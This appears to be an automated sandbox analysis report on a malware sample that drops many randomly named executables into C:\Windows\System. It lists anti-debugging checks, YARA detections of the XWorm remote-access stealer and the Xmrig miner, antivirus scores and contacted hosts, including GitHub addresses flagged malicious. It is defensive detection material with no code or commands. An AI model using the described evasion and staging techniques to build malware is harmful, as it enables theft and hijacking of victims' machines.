Source: C:\Windows\System\hAOVVjq.exe	Thread delayed: delay time: 41000
Source: C:\Windows\System\oxCQuSo.exe	Thread delayed: delay time: 41000
Source: C:\Windows\System\vyHGCnK.exe	Thread delayed: delay time: 41000
Source: C:\Windows\System\mbSqRHL.exe	Thread delayed: delay time: 41000
Source: C:\Windows\System\VFkciqc.exe	Thread delayed: delay time: 41000
Source: C:\Windows\System\sdTevgk.exe	Thread delayed: delay time: 41000
Source: C:\Windows\System\eVVPPqR.exe	Thread delayed: delay time: 41000
Source: C:\Windows\System\VHwkuIa.exe	Thread delayed: delay time: 41000
Source: C:\Windows\System\WLWcTVM.exe	Thread delayed: delay time: 41000
Source: C:\Windows\System\WCbcoxD.exe	Thread delayed: delay time: 41000
Source: C:\Windows\System\QWtCxan.exe	Thread delayed: delay time: 41000
Source: C:\Windows\System\fpHmIIc.exe	Thread delayed: delay time: 41000
Source: C:\Windows\System\FGSooXz.exe	Thread delayed: delay time: 41000
Source: C:\Windows\System\mKdsHiQ.exe	Thread delayed: delay time: 41000
Source: C:\Windows\System\nWSykjl.exe	Thread delayed: delay time: 41000
Source: C:\Windows\System\LKurWpq.exe	Thread delayed: delay time: 41000
Source: C:\Windows\System\iHSYLud.exe	Thread delayed: delay time: 41000
Source: C:\Windows\System\tyQdqmC.exe	Thread delayed: delay time: 41000
Source: C:\Windows\System\sabRErB.exe	Thread delayed: delay time: 41000
Source: C:\Windows\System\ZTSJHKb.exe	Thread delayed: delay time: 41000
Source: C:\Windows\System\xNhRSWh.exe	Thread delayed: delay time: 41000
Source: C:\Windows\System\jtnQpnb.exe	Thread delayed: delay time: 41000
Source: C:\Windows\System\hEUEsIC.exe	Thread delayed: delay time: 41000
Source: C:\Windows\System\UqXZtcb.exe	Thread delayed: delay time: 41000

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Process information queried: ProcessInformation

Contains functionality to check if a debugger is running (IsDebuggerPresent)

Source: C:\Windows\System\xIpouRJ.exe

Code function: 4_2_00007FF66689D6D4 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,

4_2_00007FF66689D6D4

Contains functionality to dynamically determine API calls

Source: C:\Windows\System\xIpouRJ.exe

4_2_00007FF66685EBF0

Enables debug privileges

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Process token adjusted: Debug

Source: C:\Windows\System\xIpouRJ.exe	Code function: 4_2_00007FF66689D6D4 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	4_2_00007FF66689D6D4
Source: C:\Windows\System\ERbKWDm.exe	Code function: 5_2_00007FF67DC6D6D4 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	5_2_00007FF67DC6D6D4
Source: C:\Windows\System\ERbKWDm.exe	Code function: 5_2_00007FF67DCD4578 SetUnhandledExceptionFilter,	5_2_00007FF67DCD4578
Source: C:\Windows\System\wHnuprt.exe	Code function: 6_2_00007FF7C3BFD6D4 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	6_2_00007FF7C3BFD6D4
Source: C:\Windows\System\wHnuprt.exe	Code function: 6_2_00007FF7C3C64578 SetUnhandledExceptionFilter,	6_2_00007FF7C3C64578
Source: C:\Windows\System\uxMRJKa.exe	Code function: 7_2_00007FF6BEB94578 SetUnhandledExceptionFilter,	7_2_00007FF6BEB94578
Source: C:\Windows\System\uxMRJKa.exe	Code function: 7_2_00007FF6BEB2D6D4 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	7_2_00007FF6BEB2D6D4
Source: C:\Windows\System\bJVoOik.exe	Code function: 8_2_00007FF6B3D7D6D4 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	8_2_00007FF6B3D7D6D4
Source: C:\Windows\System\bJVoOik.exe	Code function: 8_2_00007FF6B3DE4578 SetUnhandledExceptionFilter,	8_2_00007FF6B3DE4578
Source: C:\Windows\System\wkazDeV.exe	Code function: 9_2_00007FF68B3AD6D4 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	9_2_00007FF68B3AD6D4
Source: C:\Windows\System\wkazDeV.exe	Code function: 9_2_00007FF68B414578 SetUnhandledExceptionFilter,	9_2_00007FF68B414578
Source: C:\Windows\System\VWrcuzM.exe	Code function: 10_2_00007FF748434578 SetUnhandledExceptionFilter,	10_2_00007FF748434578
Source: C:\Windows\System\VWrcuzM.exe	Code function: 10_2_00007FF7483CD6D4 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	10_2_00007FF7483CD6D4

Source: conhost.exe, 00000002.00000002.4019156239.00000271E8700000.00000002.00000001.00040000.00000000.sdmp	Binary or memory string: Shell_TrayWnd
Source: conhost.exe, 00000002.00000002.4019156239.00000271E8700000.00000002.00000001.00040000.00000000.sdmp	Binary or memory string: Progman
Source: conhost.exe, 00000002.00000002.4019156239.00000271E8700000.00000002.00000001.00040000.00000000.sdmp	Binary or memory string: ?Program Manager
Source: conhost.exe, 00000002.00000002.4019156239.00000271E8700000.00000002.00000001.00040000.00000000.sdmp	Binary or memory string: Progmanlock

Queries the volume information (name, serial number etc) of a device

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\assembly\GAC\Microsoft.mshtml\7.0.3300.0__b03f5f7f11d50a3a\Microsoft.mshtml.dll VolumeInformation

Stealing of Sensitive Information

Yara detected XWorm

Source: Yara match

File source: Process Memory Space: file.exe PID: 6220, type: MEMORYSTR

Remote Access Functionality

Yara detected XWorm

Source: Yara match

File source: Process Memory Space: file.exe PID: 6220, type: MEMORYSTR

Screenshots

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Network Map

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Contacted Public IPs

IP	Domain	Country	ASN	ASN Name	Malicious
140.82.121.4	github.com	United States	36459	GITHUBUS	false
3.120.98.217	unknown	United States	16509	AMAZON-02US	true
185.199.111.133	raw.githubusercontent.com	Netherlands	54113	FASTLYUS	true
185.199.110.154	github.githubassets.com	Netherlands	54113	FASTLYUS	false

Contacted Domains

Name	IP	Active
github.com	140.82.121.4	true
raw.githubusercontent.com	185.199.111.133	true
github.githubassets.com	185.199.110.154	true
time.windows.com	unknown	unknown

Contacted URLs

Name	Malicious	Reputation
https://github.githubassets.com/assets/imolorhe-9d771b1d4332.jpeg	false	unknown
https://github.githubassets.com/assets/chaynhq-4c5953025dca.png	false	unknown
https://github.githubassets.com/assets/vendors-node_modules_github_remote-form_dist_index_js-node_modules_delegated-events_dist_inde-94fd67-9a621ecbf672.js	false	unknown
https://github.githubassets.com/assets/kpmg-c249f20c5173.svg	false	unknown
https://github.githubassets.com/assets/git-branch-productivity-c304b83d09c7.svg	false	unknown
https://github.githubassets.com/assets/sindresorhus-d3224f241a4d.jpeg	false	unknown
https://github.githubassets.com/assets/discussions-adf1d1b8b95c.css	false	unknown
https://github.githubassets.com/assets/element-registry-f52a50a0449b.js	false	unknown
https://github.githubassets.com/assets/vendors-node_modules_delegated-events_dist_index_js-node_modules_github_catalyst_lib_index_js-06ff531-bf7e5a3732fd.js	false	unknown
https://github.githubassets.com/assets/shape-0-df97fa6b0c27.svg	false	unknown
https://github.githubassets.com/assets/primer-react-css.8879c83c1311e6328466.module.css	false	unknown
https://github.githubassets.com/assets/vendors-node_modules_primer_react_lib-esm_KeybindingHint_KeybindingHint_js-node_modules_githu-3fe5e5-779b0a7957e4.js	false	unknown
https://github.githubassets.com/assets/homebrew-c7e38eeacb52.png	false	unknown
https://github.githubassets.com/assets/vendors-node_modules_github_mini-throttle_dist_index_js-node_modules_primer_react_lib-esm_Fea-39267a-9ffd541aafbc.js	false	unknown
https://github.githubassets.com/assets/ui_packages_react-core_create-browser-history_ts-ui_packages_react-core_AppContextProvider_ts-ffb979-ed6ff1fbeca4.js	false	unknown
https://github.githubassets.com/assets/dashboard-a70f6c490d6e.css	false	unknown
https://github.githubassets.com/assets/global-103ebe55f9d9.css	false	unknown
https://github.githubassets.com/assets/sap-96248a56d312.svg	false	unknown
https://github.githubassets.com/assets/notifications-global-54f34167118d.js	false	unknown
https://github.githubassets.com/assets/vendors-node_modules_oddbird_popover-polyfill_dist_popover_js-56729c905fe2.js	false	unknown
https://github.githubassets.com/assets/illu-secret-scanning-2-88fb429376d6.png	false	unknown
https://github.githubassets.com/assets/vendors-node_modules_github_remote-form_dist_index_js-node_modules_delegated-events_dist_inde-893f9f-6cf3320416b8.js	false	unknown
https://github.githubassets.com/assets/commandpost-18d45fffda67.png	false	unknown
https://github.githubassets.com/assets/footer-mona-d1c861cd8018.png	false	unknown
https://github.githubassets.com/assets/eslint-33bd6140c37f.png	false	unknown
https://github.githubassets.com/assets/vendors-node_modules_github_arianotify-polyfill_ariaNotify-polyfill_js-node_modules_github_mi-247092-b9c7cf3107b7.js	false	unknown
https://github.githubassets.com/assets/vendors-node_modules_github_auto-complete-element_dist_index_js-a164c5ea9f62.js	false	unknown
https://github.githubassets.com/assets/vendors-node_modules_scroll-anchoring_dist_scroll-anchoring_esm_js-node_modules_stacktrace-pa-a71630-67856ad29bae.js	false	unknown
https://github.githubassets.com/assets/footer-copilot-54114bfd1d20.png	false	unknown
https://github.githubassets.com/assets/app_assets_modules_github_sticky-scroll-into-view_ts-112600808cf9.js	false	unknown
https://github.githubassets.com/assets/play-1844e8414ade.png	false	unknown
https://github.githubassets.com/assets/footer-blur-8bc8e1f23df6.png	false	unknown
https://github.githubassets.com/assets/vendors-node_modules_primer_react_lib-esm_Dialog_Dialog_js-node_modules_primer_react_lib-esm_-34d71e-a36ca1cac968.js	false	unknown
https://github.githubassets.com/assets/ui_packages_failbot_failbot_ts-aabfa4ec15fe.js	false	unknown
https://github.githubassets.com/assets/home-339181319b7e.css	false	unknown
https://github.githubassets.com/assets/vendors-node_modules_primer_react_lib-esm_ActionList_index_js-540a2acf621f.js	false	unknown
https://github.githubassets.com/assets/bg-glow-blue-036b8dc2d1ce.png	false	unknown
https://raw.githubusercontent.com/	true	unknown
https://github.githubassets.com/assets/dark-9c5b7a476542.css	false	unknown
https://github.githubassets.com/assets/vendors-node_modules_primer_behaviors_dist_esm_index_mjs-4aa4b0e95669.js	false	unknown
https://github.githubassets.com/assets/illu-mobile-chat-9e7549906574.webp	false	unknown
https://github.githubassets.com/assets/app_assets_modules_github_behaviors_task-list_ts-app_assets_modules_github_sso_ts-ui_packages-900dde-ab87c1d6c5c8.js	false	unknown
https://github.githubassets.com/assets/illu-ghas-list-84af1f1ce2b8.png	false	unknown
https://github.githubassets.com/assets/illu-copilot-editor-6474457a5b19.png	false	unknown
https://github.githubassets.com/assets/vendors-node_modules_dompurify_dist_purify_js-b73fdff77a4e.js	false	unknown
https://github.githubassets.com/assets/hero-mobile-7163f4f5de41.webp	false	unknown
https://github.githubassets.com/assets/git-branch-security-2-f6a799957581.svg	false	unknown
https://github.githubassets.com/assets/illu-projects-2-26077f1dd188.png	false	unknown
https://github.githubassets.com/assets/vendors-node_modules_github_turbo_dist_turbo_es2017-esm_js-858e043fcf76.js	false	unknown
https://github.githubassets.com/assets/behaviors-b32b736e8b72.js	false	unknown
https://github.githubassets.com/assets/yyx990803-e11c7b140b17.jpeg	false	unknown
https://github.githubassets.com/assets/illu-codespaces-1d2d17e8b2b7.png	false	unknown
https://github.githubassets.com/assets/vendors-node_modules_color-convert_index_js-0e07cc183eed.js	false	unknown
https://github.githubassets.com/assets/directus-4da9e46da0ac.png	false	unknown
https://github.githubassets.com/assets/light-3e154969b9f9.css	false	unknown
https://github.githubassets.com/assets/github-elements-36d7dcef5a08.js	false	unknown
https://github.githubassets.com/assets/vendors-node_modules_github_selector-observer_dist_index_esm_js-f690fd9ae3d5.js	false	unknown
https://github.githubassets.com/assets/vendors-node_modules_github_relative-time-element_dist_index_js-6d3967acd51c.js	false	unknown
https://github.githubassets.com/assets/shape-3-9e542b5c31b8.svg	false	unknown
https://github.githubassets.com/assets/illu-code-scanning-fc9dfb212aa3.png	false	unknown
https://github.githubassets.com/assets/footer-star-36e5b5724973.png	false	unknown
https://github.githubassets.com/assets/home-fa7c9cc8a53c.js	false	unknown
https://github.githubassets.com/assets/illu-discussions-2-b915a6dd867e.png	false	unknown
https://github.githubassets.com/assets/illu-pull-requests-2-280cc958fc05.png	false	unknown
https://github.githubassets.com/assets/sessions-f3ddee0032e4.js	false	unknown
https://github.githubassets.com/assets/vendors-node_modules_github_quote-selection_dist_index_js-node_modules_github_session-resume_-9a8cd2-373766bf71f1.js	false	unknown
https://github.githubassets.com/assets/mercedes-fcf97d2d6ec4.svg	false	unknown
https://github.githubassets.com/assets/dayhaysoos-c50659cac73b.jpeg	false	unknown
https://github.githubassets.com/assets/shape-2-f30dcc9bd35c.svg	false	unknown
https://github.githubassets.com/assets/primer-primitives-4cf0d59ab51a.css	false	unknown
https://github.githubassets.com/assets/thumbnail-31b2a20df6fc.png	false	unknown
https://github.githubassets.com/assets/vendors-node_modules_github_file-attachment-element_dist_index_js-node_modules_primer_view-co-eb9d54-74622d897749.js	false	unknown
https://github.githubassets.com/assets/illu-dependabot-d98c73cc6724.png	false	unknown
https://github.com/	false	unknown
https://github.githubassets.com/assets/pg-f1f19955c4e4.svg	false	unknown
https://github.githubassets.com/assets/wp-runtime-f35b332dbe90.js	false	unknown
https://github.githubassets.com/assets/vendors-node_modules_github_mini-throttle_dist_index_js-node_modules_stacktrace-parser_dist_s-6b2a62-6fef0f2ad42a.js	false	unknown
https://github.githubassets.com/assets/git-branch-collaboration-2-e46b1fb1d363.svg	false	unknown
https://github.githubassets.com/assets/3m-0151c2fda0ce.svg	false	unknown
https://github.githubassets.com/assets/telus-df0c2109df99.svg	false	unknown
https://github.githubassets.com/assets/vendors-node_modules_primer_react_lib-esm_Button_Button_js-f36ad879d477.js	false	unknown
https://github.githubassets.com/assets/shape-1-c219318e479a.svg	false	unknown
https://github.githubassets.com/assets/react-lib-7b7b5264f6c1.js	false	unknown
https://github.githubassets.com/assets/primer-fefb1a332c28.css	false	unknown
https://github.githubassets.com/assets/vendors-node_modules_primer_react_lib-esm_TooltipV2_Tooltip_js-e39b44f27fbb.js	false	unknown
https://github.githubassets.com/assets/vendors-node_modules_delegated-events_dist_index_js-node_modules_github_catalyst_lib_index_js-f4b251-f7c3b6081b19.js	false	unknown
https://github.githubassets.com/assets/globe-d6f3f4ee645a.jpg	false	unknown
https://github.githubassets.com/assets/vendors-node_modules_github_hydro-analytics-client_dist_analytics-client_js-node_modules_gith-f3aee1-e6893db9c19e.js	false	unknown
https://github.githubassets.com/assets/environment-2f240f7ed1b3.js	false	unknown
https://github.githubassets.com/assets/github-6da540aa3f84.css	false	unknown
https://github.githubassets.com/assets/ui_packages_updatable-content_updatable-content_ts-3f4401350bd7.js	false	unknown
https://github.githubassets.com/assets/app_assets_modules_github_behaviors_ajax-error_ts-app_assets_modules_github_behaviors_include-d0d0a6-6faacedf87fe.js	false	unknown
https://github.githubassets.com/assets/keyboard-shortcuts-dialog-3d3b90edc171.js	false	unknown
https://github.githubassets.com/assets/vendors-node_modules_github_webgl-globe_dist_js_main_js-7ace716f3606.js	false	unknown
https://github.githubassets.com/assets/marketing-872ff8663359.js	false	unknown
https://github.githubassets.com/assets/hero-desktop-a38b0fd77b6c.webp	false	unknown
https://github.githubassets.com/assets/site-fbd7cf8f6ba2.css	false	unknown
https://github.githubassets.com/assets/footer-orb-a0438104a7a2.png	false	unknown
https://github.githubassets.com/assets/illu-copilot-sidebar-3d2efb504577.png	false	unknown
https://github.githubassets.com/assets/app_assets_modules_github_behaviors_commenting_edit_ts-app_assets_modules_github_behaviors_ht-83c235-aeae6fcdf371.js	false	unknown

AV Detection

Antivirus / Scanner detection for submitted sample

Source: file.exe

Avira: detected

Multi AV Scanner detection for submitted file

Source: file.exe

ReversingLabs: Detection: 92%

AI detected suspicious sample

Source: Submited Sample

Integrated Neural Analysis Model: Matched 100.0% probability

Machine Learning detection for sample

Source: file.exe

Joe Sandbox ML: detected

Bitcoin Miner

Yara detected Xmrig cryptocurrency miner

Source: Yara match	File source: 38.2.xNhRSWh.exe.7ff699c10000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 17.2.MwFvbxc.exe.7ff7dc870000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 19.2.oxCQuSo.exe.7ff6c9f90000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.2.uxMRJKa.exe.7ff6bea80000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 13.2.bzSbRdi.exe.7ff7777f0000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 39.2.jtnQpnb.exe.7ff7a86e0000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 25.2.VHwkuIa.exe.7ff781ee0000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 30.2.FGSooXz.exe.7ff654030000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 12.2.imwRXsl.exe.7ff74df50000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 6.2.wHnuprt.exe.7ff7c3b50000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 14.2.Csmwgyb.exe.7ff7b8680000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 37.2.ZTSJHKb.exe.7ff725c00000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.2.ERbKWDm.exe.7ff67dbc0000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 32.2.nWSykjl.exe.7ff77c770000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 40.2.hEUEsIC.exe.7ff61c860000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 9.2.wkazDeV.exe.7ff68b300000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 20.2.vyHGCnK.exe.7ff6acaf0000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 41.2.UqXZtcb.exe.7ff7bbf70000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 24.2.eVVPPqR.exe.7ff6e04e0000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.2.xIpouRJ.exe.7ff6667f0000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 26.2.WLWcTVM.exe.7ff6a8db0000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 35.2.tyQdqmC.exe.7ff60fc20000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 11.2.wJNkgSa.exe.7ff700a70000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 31.2.mKdsHiQ.exe.7ff757760000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 15.2.defQfgC.exe.7ff6888b0000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 10.2.VWrcuzM.exe.7ff748320000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 22.2.VFkciqc.exe.7ff602990000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 16.2.XZxtJFw.exe.7ff7a5920000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 27.2.WCbcoxD.exe.7ff7b66f0000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 34.2.iHSYLud.exe.7ff7683d0000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 29.2.fpHmIIc.exe.7ff6377f0000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 28.2.QWtCxan.exe.7ff670a00000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 8.2.bJVoOik.exe.7ff6b3cd0000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 18.2.hAOVVjq.exe.7ff77b680000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 36.2.sabRErB.exe.7ff795f20000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 33.2.LKurWpq.exe.7ff650b90000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 21.2.mbSqRHL.exe.7ff62c3e0000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 23.2.sdTevgk.exe.7ff601280000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0000001C.00000002.1388918384.00007FF670A01000.00000040.00000001.01000000.0000001C.sdmp, type: MEMORY
Source: Yara match	File source: 00000012.00000002.1379197063.00007FF77B681000.00000040.00000001.01000000.00000012.sdmp, type: MEMORY
Source: Yara match	File source: 00000017.00000002.1384505778.00007FF601281000.00000040.00000001.01000000.00000017.sdmp, type: MEMORY
Source: Yara match	File source: 0000001B.00000002.1388071664.00007FF7B66F1000.00000040.00000001.01000000.0000001B.sdmp, type: MEMORY
Source: Yara match	File source: 00000010.00000002.1377736700.00007FF7A5921000.00000040.00000001.01000000.00000010.sdmp, type: MEMORY
Source: Yara match	File source: 00000015.00000002.1382318435.00007FF62C3E1000.00000040.00000001.01000000.00000015.sdmp, type: MEMORY
Source: Yara match	File source: 0000000C.00000002.1373040235.00007FF74DF51000.00000040.00000001.01000000.0000000C.sdmp, type: MEMORY
Source: Yara match	File source: 00000026.00000002.1402766893.00007FF699C11000.00000040.00000001.01000000.00000026.sdmp, type: MEMORY
Source: Yara match	File source: 00000022.00000002.1398506393.00007FF7683D1000.00000040.00000001.01000000.00000022.sdmp, type: MEMORY
Source: Yara match	File source: 0000001F.00000002.1391201441.00007FF757761000.00000040.00000001.01000000.0000001F.sdmp, type: MEMORY
Source: Yara match	File source: 00000027.00000002.1403370784.00007FF7A86E1000.00000040.00000001.01000000.00000027.sdmp, type: MEMORY
Source: Yara match	File source: 00000013.00000002.1380830249.00007FF6C9F91000.00000040.00000001.01000000.00000013.sdmp, type: MEMORY
Source: Yara match	File source: 00000011.00000002.1378491789.00007FF7DC871000.00000040.00000001.01000000.00000011.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000002.1360369085.00007FF6BEA81000.00000040.00000001.01000000.00000007.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.1358633550.00007FF6667F1000.00000040.00000001.01000000.00000004.sdmp, type: MEMORY
Source: Yara match	File source: 0000000E.00000002.1375621013.00007FF7B8681000.00000040.00000001.01000000.0000000E.sdmp, type: MEMORY
Source: Yara match	File source: 0000001E.00000002.1390519266.00007FF654031000.00000040.00000001.01000000.0000001E.sdmp, type: MEMORY
Source: Yara match	File source: 00000019.00000002.1386016707.00007FF781EE1000.00000040.00000001.01000000.00000019.sdmp, type: MEMORY
Source: Yara match	File source: 00000009.00000002.1362487750.00007FF68B301000.00000040.00000001.01000000.00000009.sdmp, type: MEMORY
Source: Yara match	File source: 0000000D.00000002.1374444194.00007FF7777F1000.00000040.00000001.01000000.0000000D.sdmp, type: MEMORY
Source: Yara match	File source: 00000014.00000002.1381442489.00007FF6ACAF1000.00000040.00000001.01000000.00000014.sdmp, type: MEMORY
Source: Yara match	File source: 00000028.00000002.1404441992.00007FF61C861000.00000040.00000001.01000000.00000028.sdmp, type: MEMORY
Source: Yara match	File source: 00000029.00000002.1405348535.00007FF7BBF71000.00000040.00000001.01000000.00000029.sdmp, type: MEMORY
Source: Yara match	File source: 0000001A.00000002.1387139413.00007FF6A8DB1000.00000040.00000001.01000000.0000001A.sdmp, type: MEMORY
Source: Yara match	File source: 00000023.00000002.1399335792.00007FF60FC21000.00000040.00000001.01000000.00000023.sdmp, type: MEMORY
Source: Yara match	File source: 00000021.00000002.1393351386.00007FF650B91000.00000040.00000001.01000000.00000021.sdmp, type: MEMORY
Source: Yara match	File source: 00000008.00000002.1361423571.00007FF6B3CD1000.00000040.00000001.01000000.00000008.sdmp, type: MEMORY
Source: Yara match	File source: 0000000B.00000002.1366848753.00007FF700A71000.00000040.00000001.01000000.0000000B.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000002.1358681117.00007FF67DBC1000.00000040.00000001.01000000.00000005.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000002.1359872361.00007FF7C3B51000.00000040.00000001.01000000.00000006.sdmp, type: MEMORY
Source: Yara match	File source: 0000000A.00000002.1363778887.00007FF748321000.00000040.00000001.01000000.0000000A.sdmp, type: MEMORY
Source: Yara match	File source: 0000001D.00000002.1389418471.00007FF6377F1000.00000040.00000001.01000000.0000001D.sdmp, type: MEMORY
Source: Yara match	File source: 00000018.00000002.1385524896.00007FF6E04E1000.00000040.00000001.01000000.00000018.sdmp, type: MEMORY
Source: Yara match	File source: 00000025.00000002.1401830291.00007FF725C01000.00000040.00000001.01000000.00000025.sdmp, type: MEMORY
Source: Yara match	File source: 0000000F.00000002.1376866872.00007FF6888B1000.00000040.00000001.01000000.0000000F.sdmp, type: MEMORY
Source: Yara match	File source: 00000016.00000002.1383583176.00007FF602991000.00000040.00000001.01000000.00000016.sdmp, type: MEMORY
Source: Yara match	File source: 00000024.00000002.1400851952.00007FF795F21000.00000040.00000001.01000000.00000024.sdmp, type: MEMORY
Source: Yara match	File source: 00000020.00000002.1392692376.00007FF77C771000.00000040.00000001.01000000.00000020.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: xIpouRJ.exe PID: 1496, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: ERbKWDm.exe PID: 6380, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: wHnuprt.exe PID: 6448, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: uxMRJKa.exe PID: 6936, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: bJVoOik.exe PID: 5648, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: wkazDeV.exe PID: 6688, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: VWrcuzM.exe PID: 6052, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: wJNkgSa.exe PID: 6504, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: imwRXsl.exe PID: 6048, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: bzSbRdi.exe PID: 6680, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: Csmwgyb.exe PID: 3232, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: defQfgC.exe PID: 4504, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: XZxtJFw.exe PID: 1660, type: MEMORYSTR

Contains functionality to registers a callback to get notified when the system is suspended or resumed (often done by Miners)

